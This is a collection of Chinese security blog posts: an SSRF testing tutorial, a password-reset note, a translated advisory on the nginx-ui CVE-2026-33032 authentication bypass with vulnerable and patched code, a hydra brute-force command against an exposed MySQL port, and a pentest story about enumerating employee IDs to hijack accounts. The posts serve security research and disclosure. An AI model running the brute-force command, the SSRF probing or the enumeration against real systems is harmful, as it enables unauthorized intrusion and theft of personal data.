http://127.0.0.1

直接编辑保持会发现它并没有解析

点击下面的简历模板

选择一个模板可以看到成功回显

这个时候可以确定漏洞存在

3. 内网IP怎么确定

起初输入127.0.0.1是没有回显的

通过HAE插件找到172和192的ip，基本上把全站的数据包看了个遍...

4.漏洞评级

案例二：如何快速验证 SSRF

1. “邮件模板”功能

有一个地方可以填写内容，并插入一些资源。

插入获取

可以看到是全回显

验证方法

这时候可以做一个很经典的验证：

自己起一个HTTP服务（本地或VPS）

然后让目标去请求你的地址：

http://你的服务器/test

结果验证

如果成功：

你会在自己服务器看到请求记录

证明“请求是服务器发起的”，而不是浏览器

总结

SSRF漏洞最核心的思路是什么？

如果把整个过程拆一下，其实就三步：

1️⃣ 找“服务器会请求外部资源”的点

比如：

模板
图片
URL

2️⃣ 想办法控制请求地址

让它请求：

你自己的服务器
内网地址

3️⃣ 判断是否有回显 / 是否可利用

有回显 → 直接利用
无回显 → 用外带方式验证

SSRF漏洞挖掘小建议

很多人学学习了SSRF的漏洞原理，但一直没挖到，原因其实很简单：

没有把它当成“一个需要主动去试的点”

你可以记住一个简单的习惯：

看到这些功能时，停一下：

模板渲染
URL 加载
外部资源引用

然后问自己一句：

这里，服务器会不会去请求？

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

密码重置中所存在的安全隐患

Fri, 24 Apr 2026 10:00:00 +0800

原创 h1 2026-04-24 10:00 四川

密码重置中所存在的安全隐患

正文

注册一个工作区访问 https://h1-*你的实例*.cloud.mattermost.com/reset_password

并输入注册邮箱检查邮箱，你会收到一个重置密码的链接

复制该链接，粘贴到记事本中，并观察其中的协议（protocol）

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1888915

跳转微信打开

1day:可实现Nginx服务器完全控制

Thu, 23 Apr 2026 10:13:00 +0800

骨哥说事 2026-04-23 10:13 四川

以下文章来源于：骨哥说事

骨哥说事

一个喜爱鼓捣的技术宅

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

近日，一款流行的基于Web的Nginx管理工具nginx-ui中发现了一个关键安全漏洞，并且已被在野利用。该工具在GitHub上拥有超过11K星标和43万+的Docker拉取量。漏洞CVE-2026-33032的CVSS得分为9.8，使攻击者能够完全控制Nginx服务器。

场景理解

nginx-ui使用了mcp-go库中的SSE传输。以下是两个重要的端点：

GET /mcp - 打开一个持久的SSE流。用于建立持久的Server-Sent Events连接以接收JSON-RPC响应并启动会话。

POST /mcp_message - 用于向MCP服务器发送命令。

当一个客户端发送GET请求到 /mcp 端点以打开流时，服务器会响应一个会话ID，如下所示：

data: /mcp_message?sessionId=9a7f3d21-6c5e-4b8a-9d72-3f1e8c4b2a11

之后，通过POST请求调用工具到 /mcp_message 端点，并携带有效的 sessionId，响应通过SSE流发送回客户端。这里，nginx-ui使用 node_secret 对MCP连接进行身份验证。

但你现在肯定在想这有什么问题，到目前为止一切看起来都正常。我们来看看。

理解安全漏洞

// Vulnerable Code
func InitRouter(r *gin.Engine) {
 r.Any(
"/mcp"
, middleware.IPWhiteList(), middleware.AuthRequired(),
  func(c *gin.Context) {
   mcp.ServeHTTP(c)
  })
 r.Any(
"/mcp_message"
, middleware.IPWhiteList(),
  func(c *gin.Context) {
   mcp.ServeHTTP(c)
  })
}

如果你仔细观察，/mcp 端点受 middleware.AuthRequired() 保护，但 /mcp_message 没有。因为 mcp.ServeHTTP() 处理所有的MCP工具调用，任何人都可以在未经身份验证的情况下通过 /mcp_message 端点执行工具。

虽然 /mcp_message 端点确实使用了 middleware.IPWhiteList()，但这一层仅存的保护自身存在一个关键缺陷：

// internal/middleware/ip_whitelist.go:11-26 - Empty whitelist allows all
funcIPWhiteList() gin.HandlerFunc {

return
 func(c *gin.Context) {
  clientIP := c.ClientIP()

if
 len(settings.AuthSettings.IPWhiteList) == 0 || clientIP == 
""
 || clientIP == 
"127.0.0.1"
 || clientIP == 
"::1"
 {
   c.Next()

return
  }
  // ...
 }
}

这里，我们可以看到如果 IPWhiteList 为空，那么这个机制就完全失效，因为它允许所有没有IP过滤的请求；并且默认安装时 IPWhiteList 是空的，这是一个失效开放的设计。

总之，如果 IPWhiteList 为空，那么下面列出的12个MCP工具可以在没有任何身份验证的情况下被攻击者访问。

可用的MCP工具

来自 mcp/nginx/:

restart_nginx - 重启Nginx进程
reload_nginx - 重新加载Nginx配置
nginx_status - 读取Nginx状态

来自 mcp/config/:

nginx_config_add - 创建新的Nginx配置文件
nginx_config_modify - 修改现有配置文件
nginx_config_list - 列出所有配置
nginx_config_get - 读取配置文件内容
nginx_config_enable - 启用/禁用站点
nginx_config_rename - 重命名配置文件
nginx_config_mkdir - 创建目录
nginx_config_history - 查看配置历史
nginx_config_base_path - 获取Nginx配置目录路径

影响

攻击者可以完全控制Nginx服务，并且可以在配置目录内创建、修改和删除任何Nginx配置文件，这会触发立即重启。
攻击者可以通过代理所有流经攻击者控制端点的流量，窃取凭证、会话令牌和其他敏感数据。
写入无效的配置文件会导致服务器重启并完全中断服务。
攻击者可以通过注入包含自定义 log_format 模式的 access_logs 指令来捕获 Authorization 头，这使其能够提升权限，访问REST API。

数据显示全球范围内暴露的Nginx实例数量。

全球共有2689个暴露的实例，其中大部分来自中国、美国、印度尼西亚、德国和香港。

现在该怎么做？

已确认CVE-2026-33032在野被积极利用。如果你正在运行易受攻击的版本，请立即更新。

如果你正在运行启用了MCP的nginx-ui：

立即更新到 v2.3.4 或更高版本
如果你无法立即更新，请立即禁用MCP，或者紧急地将可信主机添加到IP白名单中，切勿将其留空。

修复

该漏洞在2026年3月15日发布的 v2.3.4 中得到了修复，你猜对了，修复方法就是在 /mcp_message 端点上添加缺失的身份验证。

修复后的代码看起来像这样：

// Patched code
r.Any(
"/mcp_message"
, middleware.IPWhiteList(), middleware.AuthRequired(),
func
(c *gin.Context)
 {
        mcp.ServeHTTP(c)
    })

原文：

https://infosecwriteups.com/cve-2026-33032-exploitation-allows-full-control-over-nginx-server-838949e8637c

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

端口爆破神器

Wed, 22 Apr 2026 10:00:00 +0800

原创 richardo1o1 2026-04-22 10:00 四川

爆破神器-hydra

正文

某日,发现厂商3306端口居然是对外开放的:

于是想到了用这个工具来爆破,简单安装

sudo apt-get install hydra~

而后直接爆破即可:

hydra -L database_username.txt -P database_password.txt mysql://服务器ip:3306

666

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

丝滑渗透测试之有趣的注册逻辑

Tue, 21 Apr 2026 10:00:00 +0800

pippybear 2026-04-21 10:00 四川

以下文章来源于：安全无界

安全无界

面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。

声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

旧饭新炒，哈哈，这是很久之前的一次授权渗透测试了，目标是一个学习系统，这一次比之前好多了，虽然依旧没有给账号，但是简单看了一下系统，它有注册功能呀，舒服。

废话不多说，直接开始正文，这里是工号+密码的组合，直接冲去目标客户各网站上检索工号，很幸运，在几个页面上找到了工号，构造差不多是年份+4位数字，直接生成工号列表撞库一波，运气不佳，没有找到弱口令。

既然不成功，那就先看看注册功能。

需要输入工号、姓名，还好前面知道工号的构造，这里直接遍历跑一波，发现工号不存在会直接提示人不存在

存在则可直接注册成功，YYDS，直接注册进入系统。

使用注册成功的账号进入系统，见证奇迹的时候到了，发现登录进来并不是我随便输入的姓名：test，似乎是一个真实的姓名。

点击上传证照，发现这里居然是有数据的，包括该工号的证件信息以及一些敏感数据。

神奇了，大概捋一捋，估摸着这里有一个比较有趣的注册逻辑，即使用已知工号注册，这里不会提示账号存在，而是直接与系统中该工号的员工信息绑定，好家伙，直接梳理梳理交付报告。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开